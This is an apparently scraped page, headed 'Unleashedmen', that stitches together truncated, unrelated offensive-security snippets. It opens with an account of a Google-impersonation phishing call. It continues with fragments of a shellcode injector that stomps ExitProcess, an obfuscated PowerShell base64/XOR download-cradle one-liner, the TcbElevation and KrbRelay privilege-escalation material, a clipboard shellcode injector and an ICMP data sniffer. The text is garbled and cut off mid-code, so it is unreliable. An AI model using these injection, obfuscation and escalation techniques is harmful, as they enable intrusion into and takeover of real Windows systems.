Unleashedmen

g.co, Google's official URL shortcut (update: or Google Workspace's domain verification, see bottom), is compromised. People are actively having their Google accounts stolen.

Someone just tried the most sophisticated phishing attack I've ever seen. I almost fell for it. My mind is a little blown.

1. Someone named "Chloe" called me from 650-203-0000 with Caller ID saying "Google". She sounded like a real engineer, the connection was super clear, and she had an American accent. Screenshot.

2. They said that they were from Google Workspace and someone had recently gained access to my account, which they had blocked. They asked me if I had recently logged in from Frankfurt, Germany and I said no.

3. I asked if they can confirm this is Google calling by emailing me from a Google email and they said sure and sent me this email and told me to look for a case number in it, which I saw in

Unleashedmen

// "A process executes until one of the following events occurs:
//	  - Any thread of the process calls the ExitProcess function. 
//    - The last thread of the process terminates
//    - ..."
// Ref: https://learn.microsoft.com/en-us/windows/win32/procthread/terminating-a-process
//
// --------------------------------------------------------------------------------------------
// 
// The idea is to inject shellcode into another process and stomp the instructions of it's ExitProcess(). 
// So when ExitProcess is called, the thread will be redirected to the shellcode instead of exiting.

Unleashedmen

import openai
import boto3
import json
import time
from typing import Dict, List

openai.api_key = '### SET YOUR OPENAPI API KEY HERE ###'
session = boto3.session.Session()
client = session.client('iam')

Unleashedmen

Download Cradles

0) Extra goodies

• Obfuscated FromBase64String with -bxor nice for dynamic strings deobfuscation:

$t=([type]('{1}{0}'-f'vert','Con'));($t::(($t.GetMethods()|?{$_.Name-clike'F*g'}).Name).Invoke('Yk9CA05CA0hMV0I=')|%{$_-bxor35}|%{[char]$_})-join''

• The same as above but for UTF-16 base64 encoded strings:

Unleashedmen

// TcbElevation - Authors: @splinter_code and @decoder_it

#define SECURITY_WIN32
#include <windows.h>
#include <sspi.h>
#include <stdio.h>

#pragma comment(lib, "Secur32.lib")

void EnableTcbPrivilege(BOOL enforceCheck);

Unleashedmen

KrbRelay with RBCD Privilege Escalation HOWTO

Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.

TL;DR

No-Fix Local Privilege Escalation from low-priviliged domain user to local system on domain-joined computers.

Prerequisites:

• LDAP signing not required on Domain Controller (default!)

Unleashedmen

#!/usr/bin/env bash

# sudo apt install hashcat

echo -e "\033[32m"
echo '
                  _ _   ___              
  /\/\   ___   __| (_) / _ \__ _ ___ ___ 
 /    \ / _ \ / _` | |/ /_)/ _` / __/ __|
/ /\/\ \ (_) | (_| | / ___/ (_| \__ \__ \

Unleashedmen

#!/usr/bin/env python
# -*- coding: utf-8 -*-

from scapy.all import sniff, ICMP


def process_packet(packet):
    if packet.haslayer(ICMP) and packet[ICMP].type == 0:
        data = packet[ICMP].load[-8:]
        try:

Unleashedmen

// Using the clipboard as your code cave.
// Generate your shellcode with msfvenom or whatever
// Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\ClippyShellcodeInject.cs

using System;
using System.IO;
using System.Runtime.InteropServices;

namespace ClippySCInject
{

Unleashedmen

using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;